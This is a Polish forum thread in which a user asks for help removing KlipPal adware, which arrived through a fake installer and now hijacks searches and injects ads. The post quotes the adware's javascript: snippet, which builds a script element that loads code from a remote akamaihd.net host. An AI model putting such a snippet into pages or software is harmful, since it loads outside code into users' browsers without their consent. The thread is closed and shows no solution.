Skocz do zawartości

Szkodnik o nazwie KlipPal


regi1
Idź do rozwiązania Problem ogarnięty przez vicodin,

Recommended Posts

Witam,

Przedwczoraj próbując pobrać jakąs aplikacje z internetu, pobrał się niewłaściwy instalator(fałszywy), który zamiast tego co chciałem, zainstalował mi ten oto syf.
Klip pal jest o tyle denerwujacy ze zmienia mi adresy stron w wyszukiwarce na jakies za przeproszeniem g*wno. Oto link który mam w przeglądarce podczas pisania tego tematu:         javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apiklippalcom-a.akamaihd.net/gsrs?is=ad7PL&bp=BA&g=8239f2c5-7784-4808-9fc4-6bcee170fdfe";a[0].appendChild(d);}}}catch(e){}

 

Pomijam już fakt że na każdej stronie wyswietlają mi się reklamy, których wczesniej nie było i dodatkowo są one podpisane "powered by KlipPal"

 

Moje pytanie jest takie, jak sie tego pozbyc bez robienia formata, bo tego chciałbym uniknąć ze względu na pliki jakie posiadam, nie chciałbym ich stracic, ponieważ odzyskiwanie z moim łączem internetowym zajeło by wieki. Dodam, że w panelu sterowania jak i w programie CCleaner tego dziadostwa nie widac i nie moge tego tak poprostu wykasować.
Proszę o szybką pomoc.

Link to post
Share on other sites
Gość
This topic is now closed to further replies.
  • Ostatnio przeglądający   0 użytkowników

    Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...